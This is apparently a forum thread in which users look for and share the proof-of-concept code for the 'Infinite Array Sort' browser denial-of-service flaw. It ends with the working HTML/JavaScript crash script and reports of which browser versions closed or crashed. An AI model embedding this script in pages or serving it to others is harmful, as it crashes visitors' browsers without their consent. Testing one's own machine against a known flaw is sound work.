this is related to the new Infinite Array Sort Denial Of Service Vulnerability. has anybody found the source to this DoS. id like to look at it, as well test my my machine against this Infinite Array.
Printable View
this is related to the new Infinite Array Sort Denial Of Service Vulnerability. has anybody found the source to this DoS. id like to look at it, as well test my my machine against this Infinite Array.
Can you give us a bit more detail......source documentation/site?
AFAIK an infinite array is the same as an infinite table, or even division by zero?
Sorry to be stupid, but you have got me interested............I must have missed it in the news
Cheers
forgot to mention it affects most major browsers
youyr link says "The actual code required to crash the browsers has been publicly disclosed by Wever and contains only four lines of code"
I tried searhing for that but could not find anything special thanks for information anyways.
I didn't know that.
all i know is what i read in the article. it will crash your browser etc. and with 4 lines of code it could be anything, i mean i could write a c program to startup at boot and scroll lines of obscenities forever hehe. its not hard. but this is very interesting since its in the browser. i hope someone knows this flaw.
I managed to find some HTML source and I checked a few browsers with it.
http://www.edup.tudelft.nl/~bjwever/menu.php
Seems that IE on WinXP Sp2 tells you its a stack overflow but doesn't crash
Firefox crashes
IE on Win 2k SP4 crashes
thats as far as i've gotten so far
enjoy the code
IE on XP pro sp1 - closes no warning
Opera 7.54 (all on same OS) - closes no warning
FireFox 1.0 - closes no warning
all using
v_LnCode:<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>